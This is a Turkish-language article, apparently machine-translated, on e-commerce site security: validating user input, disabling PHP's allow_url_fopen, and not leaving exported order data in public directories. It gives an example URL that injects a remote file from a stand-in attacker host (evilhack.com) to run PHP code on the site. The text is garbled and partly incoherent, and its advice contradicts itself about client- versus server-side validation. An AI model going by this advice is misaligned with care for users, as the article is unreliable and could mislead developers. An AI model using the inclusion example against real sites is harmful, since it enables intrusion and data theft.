E-ticaret güvenlik – güvenlik açiklari takarak

Bir e-ticaret web sitesi güvenlik bir e-ticaret sitesi veya yazilim gelistirirken büyük bir göz olmasi gerekir. Bir gelistirici bir site tasarlarken tüm güvenlik konulari farkinda olmasi gerekir. E-ticaret bu gün daha yaygin olmasiyla birlikte, güvenlik saldirilarin sayisi kesinlikle artmaktadir. Paranoya e-ticaret sitesi gelistiriciler için saglikli bir sey, biz güvenlik sorunlari ile kapisi tutmak ve bizim kulaklari ve gözleri açik tutmak gerekir. Asagidaki bosluklar ciddi olmasina ragmen, asagidaki bosluklar varsa kolayca sabitlenir.

Bir site gelistirirken dahil edilecek bazi güvenlik konulari asagida listelenmistir. Bu makalede e-hirsizlik kapsamaz, bu benim ayri makaleye bakin.

Kullanici girisi – her giris, bir ad vb girerek, bir ürün ararken, bir miktar girerek olsun, süpheli karakterler için geçerli olmasi gerekir. Bu yapilmazsa, bu, “>?” Girmek için PHP kapanis bitis etiketleri mevcuttur ve bazi PHP kodu çalistirmak.

Bu numaralari ve karakterleri az (baskentleri dahil) ve 0-9 ve baska bir sey, yerine olmamalidir tüm karakter bir listesini yapmak izin çok daha güvenlidir. Dogrulama komut dosyasi tek her karakterin bir gezinmek gerekiyor. Bu sunucu tarafi dogrulama degil, JavaScript kullanilarak elde edilmesi gerekmektedir. Sunucu tarafinda giris dogrulama kullanarak istenmeyen karakterleri disinda tutmak için gereklidir

PHP kodu yürütürken bir baska önemli mevcuttur. PHP kullanirken bir PHP komut dosyasi dosyalarin açilmasini saglayan allow_url_fopen adli bir ayari vardir. Kesinlikle gerekli olmadikça bu ayari, kapali olmalidir.

Sadece sabit üstbilgi ve altbilgi her ikisi için PHP var hayal ve http://www.mysite.com/index.php?page=page2 olarak yazarsiniz web sayfalariniza erismek için. Tek gereken ile “http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt” yazarak bu parametrelerini degistirerek bir komut dosyasi çalistirmak için kötü niyetli bir kullanici Dosyayi “hacker.txt” bazi PHP kodu. Sen her sey olabilir, okumak PHP dosyalari, silinmis, önemli bilgiler çalindi.

Bu ayari açik veya kapali olup olmadigindan emin degilseniz, bir metin dosyasina asagidaki PHP kodu kopyalayip, ve web sunucunuza yükleyin:

Web sunucusu üzerinde komut eristiginizde, yapilandirma altinda ayari allow_url_fopen rastlamak gerekir.

Bir bilgisayar kullanici, normal sartlar altinda bu ayar degerini bulamiyor.

CSV ve mySQL dosyalari siparisleri, ürünleri gibi ihraç veri dikkatli olun. Bu verileri bir komut dosyasi ihraç ve ortak bir dosya adi yani altinda web sunucusunda tutulursa. http://www.mysite.com/admin/output_tables.csv. Bu sadece gerçekten verilen verileri kamuya açik bir dizinde bir dosya bulunan bir sorundur. Bu güvenlik boslugu önlemek için iki yol vardir – Ilk bir sifre korumali dizin arkasinda çikti dosyasi var, ikinci bir komut dosyasi bir HTML textarea form ögesi içinde bulunan veri var. Storeowner sonra textfile bu bilgileri kopyalayip kendi bilgisayarinizda yeni bir dosya olusturun ve bilgileri buraya yapistirabilirsiniz.

Tek gereken, e-ticaret yazilimi demo web sitesini kontrol ederek bu dosya adini bulmak ve gerçek bir sitede ayni dosya aramak için bir hacker.